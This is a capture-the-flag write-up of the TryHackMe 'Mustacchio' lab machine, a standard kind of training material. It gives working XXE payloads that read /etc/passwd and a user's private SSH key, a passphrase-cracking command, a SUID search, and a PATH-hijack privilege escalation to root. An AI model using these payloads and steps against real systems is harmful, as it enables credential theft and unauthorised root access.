Mustacchio

https://tryhackme.com/room/mustacchio

User flag

We start enumerating the machine with nmap

We don't get any results so let's use the -Pn flag to see if our ping probes are getting blocked.

We see there are three open ports (22, 80, 8765). Heading to port 80 we see there's a website about moustaches.

Checking the robots.txt file give us nothing interesting.

Let's try gobuster and see if we find something useful.

That "custom" directory seems interesting. Let's go check it.

If we download the users.bak file we can see some credentials (If we open de mobile.js file we can find a hash containing the same password but with no user).

We used crackstation for the hash cracking:

Now if we head to por 8765 we find a nice looking login webpage. Let's use the cracked credentials to log in.

Looking around the source code we can find a message saying that barry can use his ssh to log in and a path containing a file called "dontforget.bak". Kinda tempting. Let's go check it.

There's nothing really interesting on it to be honest.

After a while looking around trying to figure it out what to do next we found out that we can insert xml code in that text field.

It seems like we were mistaken earlier. The dontforget.bak file contains a xml code structure that we can use to gain access to the machine.

<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>joe</name>
  <author>barry</author>
  <com>his paragraph</com>
</comment>

Let's modify it to retrieve the passwd file.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
    <!ELEMENT data ANY >
    <!ENTITY file SYSTEM "file:///etc/passwd">]>
<comment>
  <name>pepe</name>
  <author>pepito</author>
  <com>&file;</com>
</comment>

Now that we know the website it vulnerable to XXE we can try to get the ssh key belonging to barry. We assume it's on the common path: /home/user/.ssh/id_rsa

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
    <!ELEMENT data ANY >
    <!ENTITY file SYSTEM "file:///home/barry/.ssh/id_rsa">]>
<comment>
  <name>pepe</name>
  <author>pepito</author>
  <com>&file;</com>
</comment>

Bingo. Now we can save it and log in using ssh.

It looks like we have to crack the passphrase first. 

python /usr/share/john/ssh2john.py id_rsa > id_hash

Now we can log in and grab the user flag.

Root flag

Let's start with manual enumeration. We can't use sudo -l because we don't know the password of barry, so let's see if there's any SUID files.

find / -perm -u=s -type f 2>/dev/null

/home/joe/live_log is not a common file. Let's check its content:

Using strings:

We see it uses "tail -f" without specifying an absolute path. That way we can create a file named "tail" that gives us a root shell, export our own path and execute it to gain privileged access.

barry@mustacchio:/tmp$ echo "/bin/bash" > tail
barry@mustacchio:/tmp$ export PATH=/tmp:$PATH
barry@mustacchio:/tmp$ echo $PATH
/tmp:/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:/tmp$ chmod +x tail 
barry@mustacchio:/tmp$ /home/joe/live_log

Bingo. We got root.

PreviousCat PicturesNextGit Happens

Last updated

Was this helpful?